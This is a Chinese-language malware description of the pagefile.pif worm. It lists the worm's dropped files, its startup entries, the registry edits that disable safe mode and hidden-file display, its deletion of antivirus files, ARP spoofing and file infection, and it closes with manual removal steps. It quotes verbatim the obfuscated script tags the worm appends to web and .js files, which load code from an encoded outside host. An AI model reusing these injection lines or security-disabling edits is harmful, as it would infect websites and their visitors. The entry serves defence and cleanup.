pagefile.pif

磁碟機新變種pagefile.pif,中毒後電腦突然卡或者電腦老是需要重新啟動,提示"Generic host process for win32 services遇到問題需要關閉",打開任務管理器查看會發現有多個偽裝的SVCHOST運行,並且有RUNDL132.EXE出現,最明顯就是在D糟根目錄下出現pagefile.pif和autorun.inf檔案,硬碟里多了許多個pagefile.pif和autorun.inf,都是系統檔案和隱藏性質。

技術細節

1.病毒運行後,衍生如下檔案或副本:

%systemroot%\system32\Com\LSASS.EXE

%systemroot%\system32\Com\netcfg.000

%systemroot%\system32\Com\netcfg.dll

%systemroot%\system32\Com\SMSS.EXE

C:\WINDOWS\system32\894729.log(6位隨機數字)

C:\894729.log(6位隨機數字)

C:\WINDOWS\system32\dnsq.dll

C:\WINDOWS\system32\ntfsus.exe

C:\Documents and Settings\All Users\「開始」選單\程式\啟動\~.exe(一定不要忘記)

或C:\Documents and Settings\用戶名\「開始」選單\程式\啟動\~.exe

各個盤下面生成pagefile.pif和autorun.inf檔案,達到通過移動存儲傳播的目的

2.添加啟動項目

C:\Documents and Settings\All Users\「開始」選單\程式\啟動\~.exe

3.通過查找某些ieframe和mozillauiwindowclass名關閉帶有某些關鍵字的IE視窗和火狐瀏覽器視窗

升級

還可能關閉帶有某些關鍵字的進程

如avast

4.刪除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面所有啟動項目

5.刪除HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\

HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\

破壞安全模式

把HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden的值改為0x00000000

使得不能顯示隱藏檔案

6.查找檔案名稱中帶有360字樣的檔案 找到即在重啟後將其刪除

7.通過ping百度網站查看是否聯網

8.通過regsvr32.exe %systemroot%\system32\com\netcfg.dll /s註冊netcfg.dll

9.連線網路下載Stop.exe到system32資料夾 命名為ntfsus.exe

該病毒具有arp欺騙功能

10.感染exe檔案(部分感染)且會通過自解壓命令感染Rar和zip檔案中的exe檔案

被感染檔案運行後會釋放一個檔案名稱.log的檔案

11.感染htm html、asp、spx、php、jsp等網頁檔案 在其後面加入

{script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"}{/script}的代碼

感染.js檔案

在其尾部加入

document.write("{ScRiPt src=""%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70''}{/sCrIpT}")

的代碼

12.後台連線某些網站刷流量

清除辦法

(怕麻煩的話,可以直接使用磁碟機免疫工具

1.刪除以下檔案:

%systemroot%\system32\Com\LSASS.EXE

%systemroot%\system32\Com\netcfg.000

%systemroot%\system32\Com\netcfg.dll

%systemroot%\system32\Com\SMSS.EXE

C:\WINDOWS\system32\894729.log(6位隨機數字)

C:\894729.log(6位隨機數字)

C:\WINDOWS\system32\dnsq.dll

C:\WINDOWS\system32\ntfsus.exe

C:\Documents and Settings\All Users\「開始」選單\程式\啟動\~.exe

2.重啟計算機

打開sreng:系統修復 - Windows Shell/IE 全選 點擊修復

雙擊我的電腦,工具,資料夾選項,查看,單擊選取"顯示隱藏檔案或資料夾" 並清除"隱藏受保護的作業系統檔案(推薦)"前面的鉤。在提示確定更改時,單擊“是” 然後確定

點擊 選單欄下方的 資料夾按鈕(搜尋右邊的按鈕)

在左邊的資源管理器中單擊打開系統所在盤刪除

C:\pagefile.pif

c:\autorun.inf

在左邊的資源管理器中單擊打開其他盤

刪除pagefile.pif

autorun.inf

3.使用防毒軟體全盤防毒 修復被感染的exe檔案

4.修復被感染的htm等網頁檔案

相關詞條

相關搜尋

熱門詞條

聯絡我們